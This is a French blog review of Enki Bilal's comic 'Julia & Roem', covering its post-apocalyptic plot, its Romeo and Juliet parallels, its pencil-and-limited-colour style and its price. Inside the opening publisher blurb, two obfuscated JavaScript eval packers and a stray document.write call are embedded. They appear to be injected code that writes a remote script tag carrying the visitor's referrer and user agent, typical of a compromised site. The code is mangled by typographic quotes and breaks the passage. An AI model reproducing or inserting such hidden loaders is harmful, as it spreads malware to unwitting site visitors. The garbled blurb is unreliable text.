Julia & Roem: la BD

“Après le « coup de sang » environnemental dont Animal’z relatait l’impact tragique et dévastateur, document.write(“”); la planète s’apaise et se recompose, les survivants réapprennent à s’organiser. Dans cette géographie chamboulée, des déserts ont surgi. Et c’est au cœur de l’un d’entre eux, bien improbablement situé à l’emplacement de la mer Baltique, que l’on suit la trace d’un ex aumônier militaire énigmatique, installé au volant d’une Ferrari électrique lancée à plein régime. Trois personnages vont croiser sa route : deux jeunes hommes qu’il sauve in extremis de la mort par déshydratation, et un rapace blessé par balle, dont il répare l’aile cassée…” (Présentation sur le site de l’éditeur)
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adybn|var|u0026u|referrer|zeizr||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sanki|var|u0026u|referrer|nrnti||js|php’.split(‘|’),0,{}))

Publié en mai 2011 (mais disponible seulement depuis juin au Québec), Julia & Roem raconte l’histoire de Howard George Lawrence, un aumônier multiconfessionnel, qui traverse un désert (Gobi? mer Baltique? Nulle part et partout à la fois) au volant de sa Ferrari électrique. Le monde a été bouleversé par une apocalypse climatique et chacun essaies de survivre comme il peut dans ce monde où tout les repères connus ont disparuent. Sur sa route vascillante il croise Merkt et Roem et les sauve d’une mortelle déshydratation grâce à un de ses mystérieux gadgets militaires. Plus loin sur la route, ils entendent un coup de feu, puis trouvent un rapace blessé (un milan sacré qu’ils nommeront Jojo), que Lawrence soigne. Puis ils appercoivent la pointe d’un grand hotel, réémergeant d’une nappe de pétrole, perdu dans le désert d’une géographie fluide. C’est là qu’ils rencontreront les derniers acteurs de ce drame que le destin semble voué à leur faire rejouer. Réfugiés dans l’hotel, ils y trouvent Julia, son père, sa nouvelle femme Helda, le beau-fils Tybb, et le mercenaire Kyle Fabian Parrish.

Ma première impression a été que Julia & Roem offrait un style et une histoire plutôt similaire aux dernières oeuvres de Bilal. Mais je me suis vite rendu compte que cette nouvelle BD se déroulait dans le même univers qu’Animal’z. D’où la similitude. Mais Julia & Roem est une oeuvre indépendante qui ne nécessite pas la lecture du précédant opus. Cette fois-ci, Bilal nous présente une variation sur Roméo et Juliette (bien sûr: Roem est Roméo, Julia = Juliette, H.G. Lawrence = le frère Laurent, Merkt = Mercutio, Tybb = Tybalt et Kyle F. Parrish = Pâris) où il explore les thématiques des relations humaines et, surtout, de l’amour. Mais Roem et Julia sauront-ils échapper au destin que leur avait initialement attribué Shakespeare?

Voyons ce qu’en dit Bilal (sur Dailymotion):

(Voir aussi une video où Bilal parle de la création de Julia & Roem et une interview sur France Info Culture)

Julia & Roem présente une histoire plus sobre et plus accessible, ainsi qu’un style beaucoup plus sombre et flou que ses ouvrages précédents. Pourtant il utilise une technique (crayon de bois) et une palette de couleurs (noir, blanc, bleu et rouge) beaucoup plus simples. C’est très beau mais cela me donne l’impression de dessins inachevés. Dans l’ensemble, cette bande-dessinée nous offre une petite lecture rapide mais qui laisse un petit arrière goût d’insatisfaction. On aimerait toujours en voir plus… (surtout après avoir payé $32.95! Quoique vous pouvez aussi l’emprunter à votre bibliothèque de quartier) Mais c’est quand même du Bilal, alors c’est une lecture incontournable.

Julia & Roem, par Enki Bilal. Casterman, 2011. Couleur, 31.1 x 24.2 cm, 80 pgs. 18.00 € / $32.95 Can. Recommandé pour adolescents (12+). ISBN: 9782203033085.
Julia & Roem © Casterman 2011 • Enki Bilal.

(Voir aussi le commentaire sur l’application iPad de Julia & Roem)